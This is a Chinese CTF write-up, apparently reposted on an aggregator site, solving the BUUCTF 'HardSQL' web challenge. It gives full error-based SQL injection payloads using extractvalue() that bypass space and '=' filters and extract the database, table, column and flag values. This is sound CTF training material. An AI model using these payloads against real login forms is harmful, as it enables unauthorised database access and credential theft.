日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問 生活随笔!

生活随笔

當前位置: 首頁 > 运维知识 > 数据库 >内容正文

数据库

极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL

發布時間:2024/1/23 数据库 28 豆豆
生活随笔 收集整理的這篇文章主要介紹了 极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL 小編覺得挺不錯的,現在分享給大家,幫大家做個參考.

CTF-Web-[極客大挑戰 2019]HardSQL

博客說明

文章所涉及的資料來自互聯網整理和個人總結,意在于個人學習和經驗匯總,如有什么地方侵權,請聯系本人刪除,謝謝!本文僅用于學習與交流,不得用于非法用途!

CTP平臺

網址

https://buuoj.cn/challenges

題目

Web類,[極客大挑戰 2019]HardSQL

打開題目的實例

思路

SQl的題目,首先試一試萬能密碼

試一下雙寫

看來被封死了,想想其他的辦法,可以使用extractvalue和updatexml進行報錯注入,空格和=號沒有,所以我們要使用()來代替空格,使用like來代替=號

使用extractvalue()

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23

這一下報錯把數據庫名給爆出來了

爆表 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23

爆字段 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23

爆數據

把password查出來

/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23

flag出來了,不對好像只有一半,使用{left(),right()}

/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23

拼接起來就是flag了

感謝

BUUCTF

以及勤勞的自己

總結

以上是生活随笔為你收集整理的极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL的全部內容,希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網站內容還不錯,歡迎將生活随笔推薦給好友。